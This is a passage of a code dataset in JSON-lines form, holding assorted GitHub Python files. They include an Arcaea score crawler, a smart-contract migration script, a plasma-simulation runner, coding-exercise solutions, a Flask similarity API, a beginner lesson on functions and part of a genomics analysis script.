\"\"\n return result\n\nasync def _query(id: str):\n cache = load_cache()\n # print(cache)\n try:\n id = cache[id]\n except KeyError:\n pass\n async with websockets.connect(\"wss://arc.estertion.win:616/\") as ws:\n await ws.send(id)\n buffer = \"\"\n scores = []\n userinfo = {}\n song_title = {}\n while buffer != \"bye\":\n try:\n buffer = await ws.recv()\n except Exception:\n return 0\n if type(buffer) == type(b''):\n # print(\"recv\")\n obj = json.loads(str(brotli.decompress(buffer), encoding='utf-8'))\n # al.append(obj)\n if obj['cmd'] == 'songtitle':\n song_title = obj['data']\n elif obj['cmd'] == 'scores':\n scores += obj['data']\n elif obj['cmd'] == 'userinfo':\n userinfo = obj['data']\n scores.sort(key=cmp, reverse=True)\n return song_title, userinfo, scores\n\ndef get_b30_dict(id, songtitle: dict, userinfo: dict, scores: list):\n b30_dict = {}\n ptt = userinfo['rating'] / 100\n brating, rrating, maxptt, best30_list, best30_overflow = calc(ptt, scores)\n best30_songinfo,best30_overflow_songinfo = get_b30_song_info(songtitle,scores)\n userinfo[\"code\"] = id\n b30_dict[\"best30_avg\"] = brating\n b30_dict[\"recent10_avg\"] = rrating\n b30_dict[\"theory_ptt\"] = maxptt\n b30_dict[\"account_info\"] = userinfo\n b30_dict[\"best30_list\"] = best30_list\n b30_dict[\"best30_overflow\"] = best30_overflow\n b30_dict[\"best30_songinfo\"] = best30_songinfo\n b30_dict[\"best30_overflow_songinfo\"] = best30_overflow_songinfo\n return b30_dict\n\ndef get_b30_song_info(songtitle: dict, scores: list):\n best30_songinfo = []\n best30_overflow_songinfo = []\n for i in range(0,40):\n if i <=29:\n songinfo={}\n sid = scores[i][\"song_id\"]\n name_en = songtitle[sid][\"en\"]\n note = scores[i][\"perfect_count\"] + scores[i][\"near_count\"] + scores[i][\"miss_count\"]\n songinfo[\"name_en\"] = name_en\n songinfo[\"note\"] = note\n songinfo[\"side\"] = 0\n best30_songinfo.append(songinfo)\n else:\n songinfo = {}\n sid = scores[i][\"song_id\"]\n name_en = songtitle[sid][\"en\"]\n note = scores[i][\"perfect_count\"] + scores[i][\"near_count\"] + scores[i][\"miss_count\"]\n songinfo[\"name_en\"] = name_en\n songinfo[\"note\"] = note\n songinfo[\"side\"] = 0\n best30_overflow_songinfo.append(songinfo)\n return best30_songinfo,best30_overflow_songinfo\n\nasync def b30(id: str):\n song_title, userinfo, scores = await _query(id)\n b30_dict = get_b30_dict(id, song_title,userinfo,scores)\n return b30_dict\n\ndef get_recent_songinfo(songtitle: dict, scores: list):\n songinfo = []\n song_info = {}\n sid = scores[0][\"song_id\"]\n name_en = songtitle[sid][\"en\"]\n note = scores[0][\"perfect_count\"] + scores[0][\"near_count\"] + scores[0][\"miss_count\"]\n song_info[\"name_en\"] = name_en\n song_info[\"note\"] = note\n song_info[\"side\"] = 0\n songinfo.append(song_info)\n return songinfo\n\ndef get_recent_dict(id, song_title: dict, userinfo: dict):\n recent_dict = {}\n songinfo = get_recent_songinfo(song_title, userinfo[\"recent_score\"])\n userinfo[\"code\"] = id\n recent_dict[\"account_info\"] = userinfo\n recent_dict[\"recent_score\"] = userinfo[\"recent_score\"]\n recent_dict[\"songinfo\"] = songinfo\n return recent_dict\n\nasync def recent(id: str):\n send = id\n send += \" -1 -1\"\n song_title, userinfo, scores = await _query(send)\n recent_dict = get_recent_dict(id, song_title, userinfo)\n\n return recent_dict\n\nclass Arcaea:\n\n @staticmethod\n async def run(operation, aid, num=0):\n result = []\n if operation == 'recent':\n try:\n s = await recent(aid)\n except Exception as e:\n s = [\"An exception occurred: %s\" % repr(e)]\n result.append(s)\n elif operation == 'best':\n try:\n s = await b30(aid)\n except Exception as e:\n s = [\"An exception occurred: %s\" % repr(e)]\n result.append(s)\n return result\n","repo_name":"guh0613/nonebot_plugin_arc0test","sub_path":"arcaea_crawler.py","file_name":"arcaea_crawler.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28768980072","text":"from brownie import World, accounts\nfrom civ.metadata import PLAYERS, WORLDS\n\n\ndef main():\n accounts.load(\"1\")\n players = list(PLAYERS.values())\n\n old_world = World.at(WORLDS[-2])\n new_world = World.at(WORLDS[-1])\n\n new_world.migrateWorld(old_world.address, { 'from': accounts[0] })\n new_world.migratePlayers(old_world.address, players, { 'from': accounts[0] })\n","repo_name":"f8n/fnd-civ","sub_path":"scripts/migrate_world.py","file_name":"migrate_world.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"71947688040","text":"import numpy as np\nimport libconf\nimport io\nfrom periodictable import deuterium, aluminum, nitrogen, tungsten\nimport subprocess as sp\nimport os\nimport shutil\nfrom os.path import join\n\ndef run_gitr(base_path, output_path, location_index, impurity_symbol):\n \"\"\"\n Launch GITR using subprocess.Popen and save output to the output folder.\n \"\"\"\n positions_file = f\"positions_{impurity_symbol}_loc_{location_index}.nc\"\n gitr_path = join(base_path, \"GITR\")\n positions_file_path = join(output_path, positions_file)\n \n print(\"Running Simulation!\")\n sp.Popen([gitr_path]).wait()\n \n shutil.copyfile(join(output_path, \"positions.nc\"), positions_file_path)\n os.remove(join(output_path, \"positions.nc\"))\n os.remove(join(output_path, \"positions.m\"))\n\ndef read_config(filename):\n \"\"\"Reads a configuration from a given filename.\"\"\"\n with io.open(filename, 'r') as f:\n return libconf.load(f)\n\ndef write_config(filename, config):\n \"\"\"Writes a configuration to a given filename.\"\"\"\n with io.open(filename, 'w') as f:\n libconf.dump(config, f)\n\ndef update_species_properties(filename, impurity_species, background_species, cell_index):\n \"\"\"Updates species properties in the input file.\"\"\"\n impurity_symbol = impurity_species.symbol\n ionization_file = f\"ADAS_Rates_{impurity_symbol}.nc\"\n particle_source_file = f\"particle_source_{impurity_symbol}_{cell_index}.nc\"\n \n try:\n config = read_config(filename)\n config['backgroundPlasmaProfiles'].update({'Z': background_species.number, 'amu': background_species.mass})\n config['impurityParticleSource']['initialConditions'].update({\n 'impurity_Z': impurity_species.number, 'charge': 0.0, 'impurity_amu': impurity_species.mass\n })\n config['impurityParticleSource']['ionization']['fileString'] = ionization_file\n config['impurityParticleSource']['recombination']['fileString'] = ionization_file\n config['particleSource']['ncFileString'] = particle_source_file\n write_config(filename, config)\n except (KeyError, IOError) as e:\n print(f\"Error updating species properties: {e}\")\n\n# Testing the function\nBASE_PATH = \"/Users/42d/GITR-1.3.0/build/\"\nOUTPUT_PATH = \"/Users/42d/MPEX-GITR-WallDYN/gitr/output\"\nFILENAME = \"/Users/42d/MPEX-GITR-WallDYN/gitr/input/gitrInput.cfg\"\nMATERIALS = [deuterium, aluminum, nitrogen, tungsten]\n\nfor material in MATERIALS:\n for cell_index in range(1, 95):\n update_species_properties(FILENAME, material, deuterium, cell_index)\n run_gitr(BASE_PATH, OUTPUT_PATH, cell_index, material.symbol)\n","repo_name":"ORNL-Fusion/MPEX-WallDYN","sub_path":"gitr/gitr_material_impact_simulations.py","file_name":"gitr_material_impact_simulations.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22278158016","text":"days = [0] * 366 # 365일 배열\n\nimport sys\ninput = sys.stdin.readline\nN = int(input())\n\nfor _ in range(N):\n S, E = map(int, input().split()) # 시작일, 끝일 받아오기\n for se in range(S, E+1):\n days[se] += 1 # 일정있는 일에 1개씩 늘이기\n\nrow = 0\ncol = 0\nans = 0\n\nfor d in range(1, 366):\n if days[d]:\n row = max(row, days[d])\n col += 1\n else:\n ans += row * col\n row = 0\n col = 0\nans += row * col # 365일에 해당하는 부분도 고려\n\nprint(ans)","repo_name":"cheon4050/CodingTest-Study","sub_path":"17주차/20207/nadonghyeon.py","file_name":"nadonghyeon.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34332537689","text":"import os\nimport sys\nimport warnings\nfrom ..conf import get_conf\n\n\ndef open_file(file, mode='r', encoding=None):\n \"\"\"\n Open a file and return a corresponding file object\n\n .. warning::\n\n This function is considered deprecated and will be removed\n in future versions of Magrathea.\n Use :py:func:`magrathea.utils.compat.comp_open` instead!\n\n :param str file: pathname of the file to be opened\n :param str mode: specifies the mode in which the file is opened\n :return: file object\n \"\"\"\n warnings.warn(\n \"The `file.open_file` function has been replaced by\"\n \"`compat.comp_open` and will be removed in future versions.\"\n \"Consider using `compat.comp_open` instead of `file.open_file`.\",\n category=DeprecationWarning\n )\n if sys.version_info < (3, 0, 0):\n return open(file, mode=mode)\n else:\n encoding = encoding or get_conf('DEFAULT_CHARSET')\n return open(file, mode=mode, encoding=encoding)\n\n\nclass File(object):\n \"\"\"\n Meta class providing methods for classes that have to deal with file system objects.\n \"\"\"\n\n @staticmethod\n def _check_access(path, mode):\n \"\"\"\n Checks if a file system object can be accessed in a specific mode.\n\n On platforms supporting effective user and group IDs, the tests are performed\n against the effective IDs in order to respecting an eventually set SUID bit.\n\n :param str path: name of the file system object to be tested\n :param int mode: access mode to be tested. Should be :py:data:`os.F_OK` to test the\n existence of *path*, or it can be the inclusive OR of one or\n more of :py:data:`os.R_OK`, :py:data:`os.W_OK`, and :py:data:`os.X_OK`\n to test permissions\n :returns: True if file system object can be accessed in the indicated mode, False if not.\n :rtype: bool\n \"\"\"\n if hasattr(os, 'supports_effective_ids') and os.access in os.supports_effective_ids:\n # noinspection PyArgumentList\n status = os.access(path, mode, effective_ids=True)\n else:\n status = os.access(path, mode)\n return status\n\n @staticmethod\n def _check_file_exists(file):\n \"\"\"\n Checks if a file system object exists and is a regular file.\n\n :param str file: name of the file system object to be tested\n :returns: True if file system object exists and is a regular file, False if not.\n :rtype: bool\n \"\"\"\n return os.path.exists(os.path.abspath(file)) and os.path.isfile(os.path.abspath(file))\n\n @staticmethod\n def _check_dir_exists(path):\n \"\"\"\n Checks if a file system object exists and is a directory.\n\n :param str path: name of the file system object to be tested\n :returns: True if file system object exists and is a directory, False if not.\n :rtype: bool\n \"\"\"\n return os.path.exists(os.path.abspath(path)) and os.path.isdir(os.path.abspath(path))\n","repo_name":"RootForum/magrathea","sub_path":"magrathea/utils/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73518830759","text":"from typing import List\n\nclass Solution:\n def maxSum(self, nums: List[int]) -> int:\n dict = {}\n ls = []\n for x in nums:\n max = 0\n for a in str(x): \n if int(a) > max: \n max = int(a)\n ls.append(max)\n max = -1\n for i in range(len(nums)): \n for j in range(i+1,len(nums)):\n if ls[i] == ls[j] and nums[i]+nums[j]>max:\n max = nums[i]+nums[j]\n return max \n \n\n#https://leetcode.com/problems/max-pair-sum-in-an-array/description/\n#You are given a 0-indexed integer array nums. You have to find the maximum sum of a pair of numbers from \n# nums such that the maximum digit in both numbers are equal. Return the maximum sum or -1 if no such pair exists.","repo_name":"MatjazM2020/codingWorkouts","sub_path":"maxPairSumInAnArray.py","file_name":"maxPairSumInAnArray.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"4049044765","text":"from __future__ import print_function # Ignore this line until next month\n# Section 1 of Lesson 4\n\n# We've already used functions in every part of the presentation thus far.\n# Each time we do print(...) we're using a function, but we haven't created\n# our own functions.\n\n# First let's talk about why functions are useful. Any time you're repeating\n# some block of code you're immediately writing way too much code. Remember in\n# our dictionaries lesson where we were doing\n# print(alpha_ordering.get('z', 'There is no letter that'),\n# \"comes after 'z' in the alphabet\")\n# And we had to copy and paste that for any other letter we wanted to give the\n# same treatement to? That would be the perfect candidate for a function.\n# Let's make this our first function.\n\n# First we'll bring our dictionary over here.\nalpha_ordering = {\n 'a': 'b',\n 'b': 'c',\n 'c': 'd',\n 'd': 'e',\n 'e': 'f',\n 'f': 'g',\n 'g': 'h',\n 'h': 'i',\n 'i': 'j',\n 'j': 'k',\n 'k': 'l',\n 'l': 'm',\n 'm': 'n',\n 'n': 'o',\n 'o': 'p',\n 'p': 'q',\n 'q': 'r',\n 'r': 's',\n 's': 't',\n 't': 'u',\n 'u': 'v',\n 'v': 'w',\n 'w': 'x',\n 'x': 'y',\n 'y': 'z',\n}\n\n\n# Now let's start writing our function. Functions are *def*ined and given\n# names. To create a function you start with \"def\" followed by the function\n# name. We'll call our function \"print_next_letter\". Function names have to\n# start with a letter (upper- or lower-case) or underscore (\"_\") and then can\n# be followed by a letter, number, or underscore. After the function we use\n# parentheses to start the list of arguments a function requires.\ndef print_next_letter(alphabet_dictionary, previous_letter):\n # Then we put the actual instructions for the function inside, indented\n # once.\n default = 'There is no letter that'\n # We can use a variable to store the default return value here.\n print(alphabet_dictionary.get(previous_letter, default),\n \"comes after '{0}' in the alphabet.\".format(previous_letter))\n\n\n# When defining our function we chose to require that the alphabet_dictionary\n# be provided as the first argument, and which letter we want to find the next\n# value for. Let's use it!\nprint_next_letter(alpha_ordering, 'a')\nprint_next_letter(alpha_ordering, 'z')\n# It works!\n# But there's something that's bothering me here. The output looks like:\n# \"b comes after 'a' in the alphabet.\"\n# and I would much rather it look like:\n# \"'b' comes after 'a' in the alphabet.\"\n# Let's make a new function that does this!\n\n\n# We'll call this one print_next_letter2\ndef print_next_letter2(alphabet_dictionary, previous_letter):\n default = 'There is no letter that'\n try:\n first_part = \"'{0}'\".format(alphabet_dictionary[previous_letter])\n except KeyError:\n first_part = default\n print(first_part,\n \"comes after '{0}' in the alphabet.\".format(previous_letter))\n\n\n# Let's see how that looks:\nprint_next_letter2(alpha_ordering, 'd')\nprint_next_letter2(alpha_ordering, 'z')\n\n# MUCH BETTER!\n\n# There are more advanced things we can do with functions so read on below.\n# The presentation will be moving on now because we're probably very close to\n# being out of time at this point.\n\n# Extra material\n\n\n# Function paramters (or arguments) can have default values. For example,\n# we don't really need to pass alpha_ordering in every time we want to print\n# the next letter in the alphabet. That would be really tedious after a while.\n# Let's make a new function.\ndef print_next_letter3(previous_letter, alphabet_dictionary=alpha_ordering):\n # So we don't end up copying and pasting code, let's reuse\n # print_next_letter2\n print_next_letter2(alpha_ordering, previous_letter)\n\n\n# Now let's use it\nprint_next_letter3('g')\nprint_next_letter3('z')\n\n# It works! Notice, though, that we had to change the ordering of the\n# arguments for this new function. Arguments with default values have to come\n# after arguments without default values. We can also create a new dictionary\n# for uppercase letters and still use print_next_letter3.\n\nupper_alpha_ordering = {}\nfor (key, value) in alpha_ordering.items():\n upper_alpha_ordering[key.upper()] = value.upper()\n\n# Now we can do any of the following:\nprint_next_letter3('I', alphabet_dictionary=upper_alpha_ordering)\nprint_next_letter3('M', upper_alpha_ordering)\n# Or\nprint_next_letter2(upper_alpha_ordering, 'Y')\n# Both are equivalent and both are correct.\n\n# I personally prefer either the first or the last to the second option. When\n# passing a value to an argument with a default value it is nice to name it\n# for your future self and for others.\n# In fact as long as you know the names of parameters, you can name each\n# parameter you pass. For example, we could write\n# print_next_letter2(upper_alpha_ordering, 'Y')\n# as\nprint_next_letter2(alphabet_dictionary=upper_alpha_ordering,\n previous_letter='Y')\n# In fact, if we're passing the values by name explicitly, we can even reorder\n# them!\nprint_next_letter2(previous_letter='Y',\n alphabet_dictionary=upper_alpha_ordering)\n\n# This does not mean we can do\n# print_next_letter2('Y', alphabet_dictionary=upper_alpha_ordering)\n# Or\n# print_next_letter2('Y', upper_alpha_ordering)\n\n# There is even more to learn about functions but we'll save that for another\n# time.\n","repo_name":"MadPUG/Introduction-To-Python","sub_path":"lesson_004/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"6819072431","text":"import riak\n\nclient = riak.RiakClient()\nbucket = client.bucket('s22009')\n\n\ndoc = bucket.new('doc', data={\n 'imie': 'Marcin',\n 'nazwisko': 'L',\n 'waga': 70,\n})\ndoc.store()\n\n\nprint('pobieranie')\nadded = bucket.get('doc')\n\nprint('wyswietlanie')\nprint(added.data)\n\nprint('')\nprint('modyfikacja wyswietlanie')\nadded.data['wzrost']=178\nadded.store()\nmodified = bucket.get('doc')\nprint(modified.data)\n\nprint('')\nprint('usuwanie')\nmodified.delete()\n\nprint('pobranie')\ndeleted = bucket.get('doc')\nprint(deleted.data)\n","repo_name":"MarcinLukaszuk/NBD","sub_path":"Zadanie8/zad9.py","file_name":"zad9.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71914640680","text":"from flask import Flask, request, jsonify\nfrom flask_cors import CORS, cross_origin\n\nfrom core.config import embedding_path, embedding_shape, get_algorithms, stemmer_path\nfrom core.embeddings.EmbeddingModelWrapper import EmbeddingModelWrapper\nfrom core.stemmer.SgjpStemmer import SgjpStemmer\n\nDEBUG = True\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\nCORS(app, resources={r'/*': {'origins': '*'}})\n\nembedding = EmbeddingModelWrapper(embedding_path, embedding_shape)\n\nstemmer = SgjpStemmer(stemmer_path)\n\n\n@app.route(\"/similarity\", methods=[\"GET\"])\n@cross_origin()\ndef get_similarity():\n algorithm_names = request.args['algorithms'].split(\",\")\n sentence_1 = request.args['s1']\n sentence_2 = request.args['s2']\n algorithms = get_algorithms(embedding, stemmer)\n data = [['Algorithm', \"Value\"]]\n data.extend(\n [[algorithms[name].get_label(),\n round(algorithms[name].normalized_score(sentence_1, sentence_2), 2)] for name in algorithm_names])\n return jsonify(data), 200\n\n\nif __name__ == '__main__':\n #app.run(host='0.0.0.0')\n app.run()\n","repo_name":"cano112/wdsjn_sem_sim","sub_path":"core/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39314702832","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nN = int(input())\r\na = N//10\r\nb = N%10\r\ni = 0\r\n\r\nwhile True:\r\n c = a + b\r\n M = int(str(b) + str(c%10))\r\n a = M//10\r\n b = M%10\r\n i += 1\r\n print(M, i)\r\n if int(N) == int(M): # string형태에서는 ==로 같다 조건을 설정할 수 없는지?\r\n print(i)\r\n break\r\n\r\n\r\n","repo_name":"2023cote/2022cote_jeonghyun","sub_path":"1110.py","file_name":"1110.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24710649788","text":"from game.menu.imenu import Menu\n\nclass TicTacToeMenu(Menu):\n \"\"\"Main Tic-Tac-Toe Menu Class \"\"\"\n\n def __init__(self, game):\n super().__init__(game)\n self.state = \"LPVP\"\n self.local_game_x, self.local_game_y = self.middle_width, self.middle_height + 30\n self.pve_game_x, self.pve_game_y = self.middle_width, self.middle_height + 50\n self.credits_x, self.credits_y = self.middle_width, self.middle_height + 70\n self.cursor_rect.midtop = (self.local_game_x + self.cursor_offset, self.local_game_y)\n\n def display_menu(self):\n self.run_display = True\n while self.run_display:\n self.game.check_events()\n self.check_input()\n self.game.display.fill(self.game.BLACK)\n self.game.draw_text(\"Main Menu\", 24, self.game.WIDTH/2, self.game.HEIGHT/2 - 20)\n self.game.draw_text(\"Local PvP Game\", 18, self.local_game_x, self.local_game_y)\n self.game.draw_text(\"PvE Game\", 18, self.pve_game_x, self.pve_game_y)\n self.game.draw_text(\"Author\", 18, self.credits_x, self.credits_y)\n self.draw_cursor()\n self.blit_screen()\n\n def move_cursor(self):\n \"\"\"Logic for moving the cursor\n\n Set new cursor position, cursor sign and menu state according to chosen menu text\n Menu navigation with down key and up key\n \"\"\"\n if self.game.DOWN_KEY:\n if self.state == 'LPVP':\n self.cursor_rect.midtop = (\n self.pve_game_x + self.cursor_offset, self.pve_game_y)\n self.cursor = 'o'\n self.state = 'PVE'\n elif self.state == 'PVE':\n self.cursor_rect.midtop = (\n self.credits_x + self.cursor_offset, self.credits_y)\n self.cursor = 'x'\n self.state = 'Credits'\n elif self.state == 'Credits':\n self.cursor_rect.midtop = (\n self.local_game_x + self.cursor_offset, self.local_game_y)\n self.cursor = 'x'\n self.state = 'LPVP'\n elif self.game.UP_KEY:\n if self.state == 'LPVP':\n self.cursor_rect.midtop = (\n self.credits_x + self.cursor_offset, self.credits_y)\n self.cursor = 'x'\n self.state = 'Credits'\n elif self.state == 'PVE':\n self.cursor_rect.midtop = (\n self.local_game_x + self.cursor_offset, self.local_game_y)\n self.cursor = 'x'\n self.state = 'LPVP'\n elif self.state == 'Credits':\n self.cursor_rect.midtop = (\n self.pve_game_x + self.cursor_offset, self.pve_game_y)\n self.cursor = 'o'\n self.state = 'PVE'\n\n def check_input(self):\n \"\"\"Move cursor and when START_KEY is pressed open LPVP or PVE game mode or Credits screen\"\"\"\n self.move_cursor()\n if self.game.START_KEY:\n if self.state == 'LPVP':\n self.game.game_mode = 'LPVP'\n self.game.playing = True\n elif self.state == 'PVE':\n self.game.game_mode = 'PVE'\n self.game.playing = True\n elif self.state == 'Credits':\n self.game.game_mode = ''\n self.game.current_menu = self.game.credits_menu\n self.run_display = False # Dont show the menu\n","repo_name":"psylocube/tic-tac-toe","sub_path":"game/menu/tic_tac_toe_menu.py","file_name":"tic_tac_toe_menu.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41413327760","text":"from controllers.dataHandler import *\nfrom flask import Flask, request\n\napp = Flask(__name__)\n\n@app.route('/data', methods = ['POST'])\ndef data():\n params = request.data\n return insertData(params)\n\n@app.route('/get-avg', methods = ['GET'])\ndef avgData():\n lat = request.args.get('lat')\n lon = request.args.get('lon')\n return getAvgData(lat, lon)\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"YasminSimana/breezometer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72969370600","text":"class MyCalendarTwo(object):\n\n def __init__(self):\n self.calendars = []\n self.overlaps = []\n\n def book(self, start, end):\n \"\"\"\n :type start: int\n :type end: int\n :rtype: bool\n \"\"\"\n for ov in self.overlaps:\n if start < ov[1] and end > ov[0]:\n return False\n for cl in self.calendars:\n if start < cl[1] and end > cl[0]:\n self.overlaps.append([max(start, cl[0]), min(end, cl[1])])\n self.calendars.append([start, end])\n return True\n \n \n\n\n# Your MyCalendarTwo object will be instantiated and called as such:\n# obj = MyCalendarTwo()\n# param_1 = obj.book(start,end)","repo_name":"adityabohra007/Coding","sub_path":"731. My Calendar II.py","file_name":"731. My Calendar II.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"74453457004","text":"'''\nThis module attempts to plot the activations considered for the Neural Networks\n'''\n\nimport torch\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\n\ndef melu(x, α=0.49):\n ''' Custom ELU activation function which ensures C2 '''\n multiplier = (x>0)*((x/2 + 1 - 2*α)/(x + 1/α - 2)) + (x<0)*1\n return F.elu(x) * multiplier\n\ndef plotActivations():\n ''' Diagnostic method to plot melu '''\n x = torch.Tensor(np.arange(-2,2,0.1))\n y = melu(x)\n plt.plot(x.numpy(),y.numpy(),'r',label=\"MELU\")\n y = F.gelu(x)\n plt.plot(x.numpy(),y.numpy(),'g',label=\"GELU\")\n y = F.elu(x)\n plt.plot(x.numpy(),y.numpy(),'b',label=\"ELU\")\n plt.legend(loc=\"upper left\")\n\nif __name__ == \"__main__\":\n plotActivations()","repo_name":"ObonyoRichard/Fractal-Blackscholes-model-calibration","sub_path":"Code/Activations.py","file_name":"Activations.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33099554584","text":"import random\r\nfrom random import randint\r\n\r\nlines=colomns=8\r\nboard=[[random.randrange(0,2,1) for i in range(colomns)] for j in range(lines)] #создаём список с рандомно заполненными ячейками, 0 значит пустая, 1 значит есть фишка\r\n\r\n#функция рисует доску\r\ndef draw_board(board):\r\n\tprint(' 1 2 3 4 5 6 7 8')\r\n\tprint('A', board[0])\r\n\tprint('B', board[1])\r\n\tprint('C', board[2])\r\n\tprint('D', board[3])\r\n\tprint('E', board[4])\r\n\tprint('F', board[5])\r\n\tprint('G', board[6])\r\n\tprint('H', board[7])\r\n\r\n#функция удаляет строку или столбец введённый пользователем\r\ndef delete(players_move, board, colomns, lines):\r\n\tif players_move=='a':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[0][i]=0\r\n\telif players_move=='b':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[1][i]=0\r\n\telif players_move=='c':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[2][i]=0\r\n\telif players_move=='d':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[3][i]=0\r\n\telif players_move=='e':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[4][i]=0\r\n\telif players_move=='f':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[5][i]=0\r\n\telif players_move=='g':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[6][i]=0\r\n\telif players_move=='h':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[7][i]=0\r\n\telse:\r\n\t\tplayers_move=int(players_move)\r\n\t\tfor i in range(lines):\r\n\t\t\tboard[i][players_move-1]=0\r\n\t\r\n\r\np1=str(input(\"what is the name of the player number 1? \\n\")) #запрос имени первого игрока\r\np2=str(input(\"what is the name of the player number 2? \\n\")) #запрос имени второго игрока\r\nn=0\r\ndraw_board(board) #рисуем доску\r\n\r\nplayers_move=input('What is your move?\\n') #запрашиваем ход игрока\r\nwhile board.count([0]*lines)!=lines: #пока все элементы списка не будут состоять из одних нулей\r\n\tn+=1 #счётчик очерёдности хода\r\n\tdelete(players_move, board, colomns, lines) #удаляем фишки\r\n\tif board.count([0]*lines)==lines: #заканчиваем не запрашиваем ничего и заканчиваем если больше нет фишек\r\n\t\tbreak \r\n\tdraw_board(board) #заново рисуем доску с изменёнными значениями \r\n\tplayers_move=input('What is your move?\\n') #запрашиваем очередной ход игрока\r\n\r\nif n%2==0:\r\n\tprint(p2)\r\nelse:\r\n\tprint(p1)\t","repo_name":"VM5Ball/-Fin-Uni","sub_path":"Супер НИМ.py","file_name":"Супер НИМ.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5033504147","text":"def factors(n):\n\tfactor_list = []\n\tfor i in range(1,n+1):\n\t\tif n%i is 0:\n\t\t\tfactor_list.append(i)\n\treturn(factor_list)\n\ndef isprime(n):\n\tif len(factors(n)) is 2: return True\n\telse: return False\n\ndef nprimes(n):\n\t(count,i,plist) = (0,1,[])\n\twhile count 0.95).apply(int)\n df['SET_IMPACT_GENE'] = ((df.CADD13_PHRED > 25) |\n (df.Loss_of_function == True)).apply(int)\n df['SET_IMPACT'] = ((df.SET_IMPACT_NON_GENIC == True) |\n (df.SET_IMPACT_GENE == True)).apply(int)\n\n#Function to make tables for plotting (descriptive)\n\ndef make_summary_table_with_CI(df, category='DUMMY'):\n '''make a summary table for counts that are available for plotting and also\n allow to annotate the 95% CI. relies on restricting input by category, so\n that the numbers are plotted correctly. Dummy will include all.'''\n \n df_ = df.copy()\n \n df_['DUMMY'] = 1\n \n df_ = df_[df_[category] == True]\n \n df_ = df_.groupby(['INDIVIDUAL', 'MUTSIG_CLASS']).count().reset_index()\n \n \n df0 = df.groupby(['INDIVIDUAL', 'MUTSIG_CLASS']).count().reset_index()\n df0 = df0[['INDIVIDUAL', 'MUTSIG_CLASS']]\n df0['POS1'] = 0\n \n df_ = pd.concat([df_, df0], sort=True)\n df_ = df_.groupby(['INDIVIDUAL', 'MUTSIG_CLASS']).sum().reset_index()\n \n df_s = df_.copy()\n \n df_ = df_.groupby(['MUTSIG_CLASS']).POS1.describe()\n \n cis = st.t.interval(0.95, np.add(df_['count'], -1), loc=df_['mean'],\n scale=df_['std']/df_['count']**0.5)\n \n df_['95CI_LOWER'] = cis[0]\n df_['95CI_UPPER'] = cis[1]\n \n return df_, df_s\n\n\ndef make_estimation_table(df):\n \n df_ = df[(df.MUTSIG_CLASS.isin(['1_sperm', '2_shared'])) &\n (df.SET_IMPACT_GENE == True)]\n \n df_ = df_.groupby('INDIVIDUAL').count().reset_index()\n \n df0 = df.groupby(['INDIVIDUAL']).count().reset_index()\n df0 = df0[['INDIVIDUAL']]\n df0['POS1'] = 0\n \n df_ = pd.concat([df_, df0], sort=True)\n df_ = df_.groupby(['INDIVIDUAL']).sum().reset_index()\n \n df_ = df_.POS1.describe()\n \n cis = st.t.interval(0.95, np.add(df_['count'], -1), loc=df_['mean'],\n scale=df_['std']/df_['count']**0.5)\n \n df_['95CI_LOWER'] = cis[0]\n df_['95CI_UPPER'] = cis[1]\n \n df_ = df_[['mean', '95CI_LOWER', '95CI_UPPER']]\n \n #Data provided by XY: {ALL:68556364bp; HI:17651035; SFARI:3185225\n \n df_100 = df_ * 100\n df_100_hi = df_100 * 17651035 / 68556364\n df_100_sfari = df_100 * 3185225 / 68556364\n \n df_100['SUBGROUP'] = 'ALL_GENES'\n df_100_hi['SUBGROUP'] = 'HI_GENES'\n df_100_sfari['SUBGROUP'] = 'SFARI_HI'\n \n 